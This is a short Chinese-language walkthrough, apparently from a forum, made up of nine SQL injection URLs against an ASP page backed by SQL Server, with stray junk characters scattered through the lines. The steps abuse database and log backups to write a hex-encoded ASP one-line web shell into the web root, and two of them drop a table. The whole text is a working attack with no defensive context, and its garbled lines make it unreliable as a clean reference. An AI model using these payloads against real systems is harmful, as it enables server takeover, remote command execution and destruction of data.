第一步
2 ]5 L, [; Q% c- V0 }http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--* J: J x% K* d& b
: F# r$ e' y" h ?0 A4 r* P9 S第二步:
, O& Q0 D& o5 V) P7 A; J4 Fhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
% |& T$ _& \0 Z$ r1 W
5 @6 b4 t0 g& F& M% `* F第三步
% C0 y; L, i! v4 ?3 W& ahttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--. S) v$ B8 L: [8 V6 Z# W
+ ~# Y& X, b# b/ u; V. |
第四步5 t7 ?0 P0 O. r
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--* w/ ?1 g+ s3 Q3 [
' k2 c9 j' t& |( F1 O, j4 m" M第五步. P- m# f! L) l& ?
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--4 `6 m/ V, ^9 B7 D- D1 G& j
* O; Y2 G5 f& r1 n第六步
. g( I9 R& M* s5 Ghttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--. L- S2 x. \( u, R2 F
6 E0 L! ?7 w2 v/ V# D& G第七步
9 E( o3 P8 Y7 p- hhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
1 |( D! I0 ]7 s R; i6 T! a3 F
第八步
' T# M/ \0 s1 h. i; X! ^* whttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--1 R: Q1 Q# i: {* k
* ~5 S* h+ D0 x4 a& v! j# ?
第九步1 ^; P5 b; y7 W/ }+ h( X# Y7 w
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
$ P; z$ F1 X; Q! E% ~0 n0 n% i' } |